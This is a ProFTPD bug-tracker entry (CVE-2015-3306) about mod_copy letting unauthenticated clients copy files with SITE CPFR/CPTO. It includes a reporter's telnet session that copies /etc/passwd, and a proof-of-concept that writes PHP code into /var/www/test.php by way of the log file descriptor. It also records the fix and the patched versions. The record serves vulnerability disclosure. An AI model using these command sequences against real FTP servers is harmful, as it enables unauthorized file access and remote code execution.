Bug 4169 – Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

Bug 4169 - Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

Summary:

Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

Status:	CLOSED FIXED

Product:	ProFTPD
Component:	mod_copy
Version:	1.3.5
Platform:	All All

Importance:	P2 critical
Assigned To:	TJ Saunders

URL:
Keywords:	Backport

Depends on:
Blocks:
	Show dependency tree / graph

Reported:	2015-04-07 16:35 UTC by TJ Saunders
Modified:	2015-05-28 05:59 UTC (History)
CC List:	9 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description TJ Saunders 2015-04-07 16:35:03 UTC

Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:

---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------

He provides another, scarier example:

------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php

test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------

test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter

Comment 1 TJ Saunders 2015-04-07 16:42:03 UTC

Pull request to fix the issue, and to provide a CopyEngine directive, so that
future mod_copy issues can be mitigated by disabling the module at runtime,
without requiring recompiling:

  https://github.com/proftpd/proftpd/pull/109

Comment 2 TJ Saunders 2015-04-07 16:55:31 UTC

Merged to master, and backported to 1.3.5 branch.

Comment 3 TJ Saunders 2015-04-15 17:53:08 UTC

This was assigned CVE-2015-3306.

Comment 4 TJ Saunders 2015-05-28 05:59:40 UTC

Resolved in 1.3.5a, 1.3.6rc1.